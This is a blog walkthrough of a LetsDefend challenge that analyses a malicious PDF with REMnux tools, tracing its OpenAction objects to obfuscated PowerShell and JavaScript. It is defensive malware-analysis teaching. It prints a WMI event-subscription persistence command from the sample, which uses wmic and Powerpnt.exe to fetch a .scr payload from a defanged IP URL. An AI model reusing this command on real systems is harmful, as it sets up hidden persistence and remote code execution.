LetsDefend: PDF Analysis Challenge Walkthrough

Analyzing a Malicious PDF Document with REMnux & Peepdf

Drew Arpino
10 min read · Mar 4, 2024
Image Credit: LetsDefend.io

Introduction:

Hello, and thanks for joining me on this walkthrough! This week I am tackling the medium-difficulty PDF Analysis Challenge on LetsDefend. It should be a great opportunity to expand my PDF analysis skills and add some new tools to my workflow. This time around, I am also trying out REMnux to work through the challenge. If you are unfamiliar, REMnux is a Linux distro built for malware analysis, so we should have some cool tools to check out. As always, this write-up will serve as both a learning journal for me and a LetsDefend challenge walkthrough for anyone who stumbles upon this post. Thanks for reading, and I hope it helps!

Challenge Link: https://app.letsdefend.io/challenge/pdf-analysis

Challenge Scenario:

An employee has received a suspicious email:

From: SystemsUpdate@letsdefend.io
To: Paul@letsdefend.io
Subject: Critical - Annual Systems UPDATE NOW
Body: Please do the dutiful before the deadline today.
Attachment: Update.pdf
Password: letsdefend

The employee has reported this incident to you as the analyst which has also forwarded the attachment to your SIEM. They have mentioned that they did not download or open the attachment as they found it very suspicious. They wish for you to analyze it further to verify its legitimacy.

NOTE: Do not open in your local environment. It is a malicious file.

This challenge prepared by @DXploiter

Set Up the REMnux Analysis Environment & Extract the Challenge File:

First, I want to set the stage since this is my first time using REMnux. I’ll be referencing the excellent REMnux Documentation regularly in this post:

https://docs.remnux.org/

Second, to keep this write-up focused, I’m going to skip a step-by-step REMnux setup guide. If you want to set up your own REMnux environment, please follow the directions provided by REMnux directly.

For reference, I opted for the virtual appliance method:

https://docs.remnux.org/install-distro/get-virtual-appliance

Okay! Now that we have our environment created, updated, isolated, and snapshotted, we can extract our challenge file archive and get started!

Questions 1, 2, & 3:

What local directory name would have been targeted by the malware?

What would have been the name of the file created by the payload?

What file type would this have been if it were created?

There are a couple of ways to approach this challenge that I am already familiar with, but since I am using a new environment for analysis, we’ll start by checking the REMnux documentation to see what PDF-specific analysis tools are available: https://docs.remnux.org/discover-the-tools/analyze+documents/pdf

Wow! There are quite a few tools we can use, but before we dive in, let’s pull back a little. I want to point out an awesome reference poster that provides some context: the SANS Analyzing Malicious Documents cheat sheet. It gives us quick, actionable tips for analyzing malicious documents.

We’ll start first with the tools that I am familiar with already and covered by the SANS cheat sheet — pdfid & pdf-parser. We can use these tools for basic analysis to get a high-level view of the malicious PDF document.

After running pdfid & pdf-parser, we get some basic information about the malicious PDF. Something interesting to note are the three /OpenActions. Open actions are triggered when a PDF file is opened and could be abused by a bad actor to execute JavaScript, open a file/web page, etc. Let’s make a note of this finding as we go deeper into the investigation.
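To make the idea behind this triage step concrete, here is a minimal Python sketch of keyword counting over the raw bytes of a PDF. It is not pdfid itself and does not reproduce its handling of obfuscated names; the SUSPICIOUS_NAMES list, the count_pdf_names function, and the sample bytes are all my own illustrative assumptions.

```python
import re

# Illustrative subset of PDF names worth flagging during triage (an assumption,
# not pdfid's actual keyword list).
SUSPICIOUS_NAMES = [b"/OpenAction", b"/AA", b"/JavaScript", b"/JS", b"/Launch", b"/EmbeddedFile"]


def count_pdf_names(data: bytes) -> dict:
    """Count how often each flagged PDF name appears in the raw bytes."""
    counts = {}
    for name in SUSPICIOUS_NAMES:
        # Require a non-alphanumeric character (or end of data) after the name,
        # so that "/JS" does not also match a longer name such as "/JSX".
        pattern = re.escape(name) + rb"(?![A-Za-z0-9])"
        counts[name.decode()] = len(re.findall(pattern, data))
    return counts


# Harmless synthetic fragment, not taken from the challenge file.
sample = (
    b"1 0 obj\n<< /Type /Catalog /OpenAction 19 0 R >>\nendobj\n"
    b"2 0 obj\n<< /S /JavaScript /JS 33 0 R >>\nendobj\n"
)
print(count_pdf_names(sample))
```

A non-zero count is only a lead to follow up on, which is why we keep digging into the flagged objects with other tools.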

pdfid output.
pdf-parser output.

While helpful, these tools aren’t giving us the deep analysis context we are looking for. Let’s try peepdf, which the REMnux documentation states can be used to “examine elements of the PDF file.”

After reviewing the tool’s documentation and checking out the usage options, let’s try it out and point it at the malicious PDF. We will use the -f option to force parsing of the file and ignore any errors that are encountered.

peepdf -f /home/remnux/Challenges/pdfAnalysis/Update.pdf
Peepdf output.

This gives us a nice overview with a bit more detail than we saw with pdfid, but we want to go even further. So, next, we’ll enter peepdf’s interactive mode with the -i option. Once we enter the interactive mode we’ll pull up the help menu and see what commands we have available to move forward.

peepdf -i -f /home/remnux/Challenges/pdfAnalysis/Update.pdf

Let’s first focus on the “suspicious elements” flagged by the tool. Remember the three Open Actions we noted after running pdfid? Let’s try to analyze these objects more closely. After running peepdf we see under /OpenAction that there are three objects: 19, 26, & 17.
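For anyone curious how those object numbers tie back to the file, here is a rough Python sketch that looks for indirect references of the form "/OpenAction N G R" in raw PDF bytes. It is only an approximation: it assumes the references are not hidden inside compressed object streams and are not inline dictionaries, both of which peepdf handles and this sketch does not. The function name and the sample bytes are hypothetical.

```python
import re


def open_action_targets(data: bytes) -> list:
    """Return object numbers referenced as '/OpenAction <obj> <gen> R'."""
    pattern = rb"/OpenAction\s+(\d+)\s+(\d+)\s+R"
    return [int(match.group(1)) for match in re.finditer(pattern, data)]


# Synthetic fragment that mirrors the three references peepdf reported.
sample = (
    b"<< /Type /Catalog /OpenAction 19 0 R >>\n"
    b"<< /Type /Catalog /OpenAction 26 0 R >>\n"
    b"<< /Type /Catalog /OpenAction 17 0 R >>\n"
)
print(open_action_targets(sample))  # prints [19, 26, 17]
```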

Let’s go down the line and use the object command to show the decoded content — we’ll start with object 19.

This is very interesting! This object contains a Base64-encoded PowerShell command. Let’s jump into CyberChef, which is also built into REMnux, and build a recipe to decode this script. Since we know the command is Base64 encoded, let’s start there and then apply a Reverse operation to get something readable:

Awesome! We successfully extracted and decoded the malicious PowerShell command with CyberChef. With that, we can answer Questions 1, 2, & 3!
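If you prefer a script to a CyberChef recipe, the same two steps (From Base64, then Reverse) can be approximated in Python. This is a minimal sketch under assumptions: the function name is hypothetical, the decoded bytes are treated as UTF-8 text, and the sample below is a harmless placeholder I encoded myself rather than the challenge payload.

```python
import base64


def decode_and_reverse(encoded: str, encoding: str = "utf-8") -> str:
    """Base64-decode the input, interpret it as text, then reverse the characters."""
    raw = base64.b64decode(encoded)
    return raw.decode(encoding, errors="replace")[::-1]


# Build a harmless test value the same way: reverse first, then Base64-encode.
placeholder = "Write-Output 'hello'"
sample = base64.b64encode(placeholder[::-1].encode("utf-8")).decode("ascii")

print(decode_and_reverse(sample))  # prints Write-Output 'hello'
```

If the output looks like text with a null byte after every character, the payload is probably UTF-16LE, and passing encoding="utf-16-le" is worth a try.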

Questions 4, 5, & 6:

Which external web domain would the malware have attempted to interact with?

Which HTTP method would it have used to interact with this service?

What is the name of the obfuscation used for the Javascript payload?

Let’s continue looking at the other /OpenAction objects and try to understand what they are doing. This time, we’ll focus on 17 — don’t worry we will circle back to 26 later.

This looks like it is pointing to something else at 33, maybe a stream within the object? Fortunately, peepdf also has a stream command we can use to show the decoded stream content.

After running it, we get the above output. This looks like obfuscated JavaScript, right? We also see some readable strings referring to HTTP requests, specifically POST, and references to JSON. We are probably looking in the right place, since these are methods for transporting data from a client to a server.

Let’s focus on the eval() function. Here is some information from Mozilla:

The eval() function evaluates JavaScript code represented as a string and returns its completion value. The source is parsed as a script.

Warning: Executing JavaScript from a string is an enormous security risk. It is far too easy for a bad actor to run arbitrary code when you use eval().

That sounds risky — it seems like this is an obfuscated payload where the eval() function reads and then executes the string.

Let’s pivot and refer back to the REMnux documentation to see if we can find a useful method to analyze scripts. Fortunately, there are a few tools listed, including JS Beautifier which can be used to “Reformat JavaScript scripts for easier analysis.”

While we can use the online version — let’s stay in REMnux and use the built-in utilities for fun. We’ll export the stream into a text file, feed it to JS-Beautify, and see if the tool deobfuscates the code in the output for further analysis…

There we go! This looks like the information we need to answer Questions 4, 5, & 6!
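Once the script is readable, pulling out the interesting indicators can also be scripted. The sketch below is an assumption-heavy illustration: it uses simple regular expressions to collect hostnames from any URLs and any quoted HTTP method names in a block of JavaScript. The summarize_js function and the example.com sample are hypothetical and are not taken from the challenge file.

```python
import re
from urllib.parse import urlparse

HTTP_METHODS = ("GET", "POST", "PUT", "DELETE", "PATCH")


def summarize_js(source: str) -> dict:
    """Collect hostnames from URLs and quoted HTTP method names found in the source."""
    urls = re.findall(r"https?://[^\s'\"<>)]+", source)
    hostnames = {urlparse(url).hostname for url in urls}
    domains = sorted(host for host in hostnames if host)
    methods = sorted(
        method for method in HTTP_METHODS
        if re.search(r"['\"]%s['\"]" % method, source)
    )
    return {"domains": domains, "methods": methods}


# Harmless stand-in for beautified JavaScript.
sample = 'var x = new XMLHttpRequest(); x.open("POST", "https://example.com/upload", true);'
print(summarize_js(sample))  # prints {'domains': ['example.com'], 'methods': ['POST']}
```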

Questions 7, 8, 9, 10, & 11:

Which tool would have been used for creating the persistence mechanism?

How often would the persistence be executed once Windows starts? (format: X.X hours)?

Which LOLBin would have been used in the persistence method?

What is the filename that would have been downloaded and executed using the LOLbin?

Where would this have been downloaded from? (format: IP address)

So let’s recap quickly. We have been doing deep dives into the /OpenAction we uncovered with peepdf and have already analyzed objects 17 & 19.

Now, let’s return to our interactive peepdf console and check out the last of the /OpenActions, object 26.

Surprise, surprise — more obfuscated code. It seems like this will attempt to execute some arbitrary code with PowerShell. Maybe we can do some dynamic analysis and actually run the code in PowerShell to understand what it does?

First, we will export the code into a PowerShell (.ps1) script file. After reviewing the REMnux docs again, it looks like we have PowerShell Core built in. This is perfect: we should be able to run our script and have it print the decoded code rather than execute it.

Even though we are performing our analysis in a sandboxed environment without network access, we will change Invoke-Expression $LoadCode to Write-Output $LoadCode so that the script writes the decoded code to the console instead of executing it.
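I made this change by hand, but the swap itself is easy to script. Here is a minimal Python sketch that replaces Invoke-Expression (and its iex alias) with Write-Output in a script's text. The function name is hypothetical, and a plain text substitution like this will miss obfuscated invocations, so always read the result before running anything.

```python
import re


def neutralize_iex(script: str) -> str:
    """Replace Invoke-Expression / iex with Write-Output so code is printed, not run."""
    # Match the cmdlet or its alias as a whole word, ignoring case.
    return re.sub(
        r"\b(?:Invoke-Expression|iex)\b",
        "Write-Output",
        script,
        flags=re.IGNORECASE,
    )


print(neutralize_iex("Invoke-Expression $LoadCode"))  # prints Write-Output $LoadCode
```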

Setting the .ps1 script to write output to the console.
Badscript.ps1 PowerShell with Write-Output.

Excellent — this output should provide us with enough information to answer the remaining questions for this challenge.

For Question 7, it looks like the script is abusing WMIC to create a persistence mechanism. For context, WMIC is an older command line tool used for interacting with Windows Management Instrumentation (WMI) which can be used to control and query Windows.

According to MITRE ATT&CK this sub-technique (T1546.003) can be abused for persistence:

Adversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription. WMI can be used to install event filters, providers, consumers, and bindings that execute code when a defined event occurs.

Let’s focus on some specifics in the output for the context of our investigation:

Query="SELECT * FROM __InstanceModificationEvent WITHIN 9000 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"

wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer CREATE Name="RHWsZbGvlj", ExecutablePath="C:\Program Files\Microsoft Office\root\Office16\Powerpnt.exe 'hxxp://60.187.184.54/wallpaper482.scr'

Okay, I’m going to stumble through an oversimplification here. It seems that the WMIC command is used to create an event subscription where every 9000 seconds (9000 / 3600 = 2.5 hours) the command line event consumer “RHWsZbGvlj” is triggered. This consumer launches the legitimate process Powerpnt.exe with the command line argument “hxxp://60[.]187[.]184[.]54/wallpaper482[.]scr” to open the wallpaper482.scr file.
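The interval arithmetic is simple, but here is a small Python sketch that pulls the WITHIN value out of the query and converts it to hours in the X.X format the question asks for. The function name is hypothetical; the query string is the one shown in the output above.

```python
import re


def within_hours(wql: str) -> float:
    """Extract the WITHIN interval (in seconds) from a WQL query and return hours."""
    match = re.search(r"\bWITHIN\s+(\d+(?:\.\d+)?)", wql, flags=re.IGNORECASE)
    if match is None:
        raise ValueError("no WITHIN clause found")
    return float(match.group(1)) / 3600


query = (
    "SELECT * FROM __InstanceModificationEvent WITHIN 9000 "
    "WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"
)
print(f"{within_hours(query):.1f} hours")  # prints "2.5 hours"
```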

Whew! Okay, now a couple of things to note here for our questions:

Since PowerPoint (Powerpnt.exe) is a legitimate binary included with Microsoft Office, this is an example of the malicious file abusing a trusted program to carry out malicious activity. This technique is known as using a “living off the land binary,” or LOLBin.

hxxp://60[.]187[.]184[.]54/wallpaper482[.]scr is a defanged URL so that it can’t be accidentally clicked — safety first!

Regarding the wallpaper482 file: a .scr file, while normally used for Windows screen savers, is an executable file type and can contain malware. In this case, I think we can be pretty confident that it does!
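Since defanging came up in the notes above, here is a minimal Python sketch of the convention used in this post: "http" becomes "hxxp" and each dot becomes "[.]". The function names are my own, and the example uses a harmless example.com URL rather than the indicator from the challenge.

```python
def defang(url: str) -> str:
    """Make a URL non-clickable: http -> hxxp, '.' -> '[.]'."""
    return url.replace("http", "hxxp", 1).replace(".", "[.]")


def refang(url: str) -> str:
    """Reverse defang() so the value can be fed to analysis tools."""
    return url.replace("hxxp", "http", 1).replace("[.]", ".")


print(defang("http://example.com/file.scr"))  # prints hxxp://example[.]com/file[.]scr
```

Only refang an indicator inside an isolated analysis environment, and only when a tool actually needs the original form.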

Question 12:

Which country is this IP Address located in?

Finally, we are at the last question! Now that we have the IP address from which the persistence payload would be retrieved, we can see what kind of geolocation intelligence we can gather about it. We’ll check a couple of geolocation databases, as the location data can vary depending on the method each provider uses to determine it.

We’ll start as usual with VirusTotal where we can see tentatively that the IP address is located in China.

To double-verify, we will also check the IP address using ipinfo.io.

Geolocation data from https://ipinfo.io/

Okay, double-confirmed! I think we can submit our answer and wrap up this investigation!
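I used the websites for these lookups, but the ipinfo.io check could also be scripted. The sketch below assumes the service's JSON endpoint at https://ipinfo.io/<ip>/json and its "country" field, which holds a two-letter country code. The function names are hypothetical, and the sample payload uses a documentation-range IP address and a placeholder country code, not real lookup results.

```python
import json
from urllib.request import urlopen


def ipinfo_url(ip: str) -> str:
    """Build the JSON lookup URL for an IP address (assumed endpoint layout)."""
    return f"https://ipinfo.io/{ip}/json"


def country_code(payload: str) -> str:
    """Return the 'country' field from a JSON response body, or 'unknown'."""
    return json.loads(payload).get("country", "unknown")


def lookup_country(ip: str) -> str:
    """Perform the live lookup; requires network access, so it is not called here."""
    with urlopen(ipinfo_url(ip), timeout=10) as response:
        return country_code(response.read().decode("utf-8"))


# Hypothetical response body for illustration only.
sample_payload = '{"ip": "203.0.113.5", "country": "ZZ"}'
print(country_code(sample_payload))  # prints ZZ
```

Run any live lookup from a machine with internet access, not from the isolated analysis VM.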

Conclusion:

We made it! Thank you to LetsDefend for hosting another awesome challenge. This was a really fun one with a lot of practical application that can be taken back into the field, including the opportunity to try out REMnux and analyze a malicious PDF file with some awesome tools like pdfid, pdf-parser, and peepdf.

Thank you so much for reading along and learning with me! I hope that you had as much fun as I did and learned something new, too. Stay curious!

Tools & References:

LetsDefend PDF Analysis Challenge: https://app.letsdefend.io/challenge/pdf-analysis

REMnux: https://remnux.org/

REMnux Documentation: https://docs.remnux.org/

Adobe Open Actions Reference: https://helpx.adobe.com/acrobat/using/applying-actions-scripts-pdfs.html

SANS Analyzing Malicious Documents Cheat Sheet: https://www.sans.org/posters/cheat-sheet-for-analyzing-malicious-documents/

pdf-parser.py: https://blog.didierstevens.com/programs/pdf-tools/

pdfid.py: https://blog.didierstevens.com/programs/pdf-tools/

peepdf: https://eternal-todo.com/tools/peepdf-pdf-analysis-tool

CyberChef: https://gchq.github.io/CyberChef/

JavaScript eval function: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/eval

JS Beautifier: https://beautifier.io/

MITRE ATT&CK Event Triggered Execution: Windows Management Instrumentation Event Subscription: https://attack.mitre.org/techniques/T1546/003/

VirusTotal: https://www.virustotal.com/

Ipinfo.io: https://ipinfo.io/
